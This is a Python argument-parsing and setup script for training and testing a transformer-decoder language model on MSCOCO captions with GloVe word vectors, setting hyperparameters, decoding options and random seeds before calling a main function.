def run(*argv): import argparse import time from utils import Storage from pathlib import Path parser = argparse.ArgumentParser( description='A language model with transformer decoder.') args = Storage() parser.add_argument( '--name', type=str, default=None, help= 'The name of your model, used for tensorboard, etc. Default: runXXXXXX_XXXXXX (initialized by current time)' ) parser.add_argument('--restore', type=str, default=None, help='Checkpoints name to load. \ "NAME_last" for the last checkpoint of model named NAME. "NAME_best" means the best checkpoint. \ You can also use "last" and "best", by default use last model you run. \ Attention: "NAME_last" and "NAME_best" are not guaranteed to work when 2 models with same name run in the same time. \ "last" and "best" are not guaranteed to work when 2 models run in the same time.\ Default: None (don\'t load anything)') parser.add_argument('--mode', type=str, default="train", help='"train" or "test". Default: train') parser.add_argument('--tf_size', type=int, default=256, help='feature size of transformer') parser.add_argument('--tf_hidden_size', type=int, default=512, help='hidden size of mlp in transformer') parser.add_argument('--n_heads', type=int, default=4, help='number of heads in transformer') parser.add_argument('--n_layers', type=int, default=5, help='number of layers in transformer') parser.add_argument( '--input_droprate', type=float, default=0.1, help= 'the droprate(the probability to be zeroed) of input embedding in transformer. 0 indicates for don\'t use dropout' ) parser.add_argument( '--droprate', type=float, default=0.25, help='The probability to be zeroed. 0 indicates for don\'t use dropout' ) parser.add_argument('--batch_size', type=int, default=256, help='number of sample in a batch') parser.add_argument( '--decode_mode', type=str, choices=['max', 'sample', 'gumbel', 'samplek', 'beam'], default='samplek', help= 'The decode strategy when freerun. Choices: max, sample, gumbel(=sample), \ samplek(sample from topk), beam(beamsearch). Default: samplek') parser.add_argument( '--top_k', type=int, default=10, help='The top_k when decode_mode == "beam" or "samplek"') parser.add_argument( '--length_penalty', type=float, default=0.7, help= 'The beamsearch penalty for short sentences. The penalty will get larger when this becomes smaller.' ) parser.add_argument('--temperature', type=float, default=1) parser.add_argument( '--dataid', type=str, default='resources://MSCOCO', help='Directory for data set. Default: resources://MSCOCO') parser.add_argument('--epoch', type=int, default=100, help="Epoch for training. Default: 100") parser.add_argument('--batch_per_epoch', type=int, default=500, help="Batches per epoch. Default: 500") parser.add_argument( '--wvid', type=str, default="resources://Glove300d", help= "Directory for pretrained wordvector. Default: resources://Glove300d") parser.add_argument( '--out_dir', type=str, default="./output", help='Output directory for test output. Default: ./output') parser.add_argument( '--log_dir', type=str, default="./tensorboard", help='Log directory for tensorboard. Default: ./tensorboard') parser.add_argument( '--model_dir', type=str, default="./model", help='Checkpoints directory for model. Default: ./model') parser.add_argument( '--cache_dir', type=str, default="./cache", help='Checkpoints directory for cache. Default: ./cache') parser.add_argument('--cpu', action="store_true", help='Use cpu.') parser.add_argument('--debug', action='store_true', help='Enter debug mode (using ptvsd).') parser.add_argument( '--cache', action='store_true', help= 'Use cache for speeding up load data and wordvec. (It may cause problems when you switch dataset.)' ) parser.add_argument('--seed', type=int, default=0, help='Specify random seed. Default: 0') parser.add_argument('--lr', type=float, default=1e-3, help='Learning rate. Default: 0.001') cargs = parser.parse_args(argv) # general setting args.name = cargs.name or time.strftime("run%Y%m%d_%H%M%S", time.localtime()) args.restore = cargs.restore args.mode = cargs.mode args.out_dir = cargs.out_dir args.log_dir = cargs.log_dir args.model_dir = cargs.model_dir args.cache_dir = cargs.cache_dir args.debug = cargs.debug args.cache = cargs.cache args.cuda = not cargs.cpu ## dataset settings args.dataid = cargs.dataid args.tokenizer = "space" args.max_sent_length = 50 args.convert_to_lower_letter = False args.min_frequent_vocab_times = 10 args.min_rare_vocab_times = 0 args.wvid = cargs.wvid ## training settings args.epochs = cargs.epoch args.lr = cargs.lr args.batch_size = 128 args.batch_num_per_gradient = 1 args.grad_clip = 5 args.show_sample = [0] # show which batch when evaluating at tensorboard args.checkpoint_steps = 20 args.checkpoint_max_to_keep = 5 ## arguments for restoring checkpoints args.restore_optimizer = True load_exclude_set = [] restoreCallback = None ## architecture settings args.batch_per_epoch = cargs.batch_per_epoch args.embedding_size = 300 args.tf_size = cargs.tf_size args.tf_hidden_size = cargs.tf_hidden_size args.n_heads = cargs.n_heads args.n_layers = cargs.n_layers args.input_droprate = cargs.input_droprate args.droprate = cargs.droprate ## decoding settings args.decode_mode = cargs.decode_mode args.top_k = cargs.top_k args.length_penalty = cargs.length_penalty args.temperature = cargs.temperature ## random seed args.seed = cargs.seed import random random.seed(cargs.seed) import torch torch.manual_seed(cargs.seed) import numpy as np np.random.seed(cargs.seed) from main import main return main(args, load_exclude_set, restoreCallback)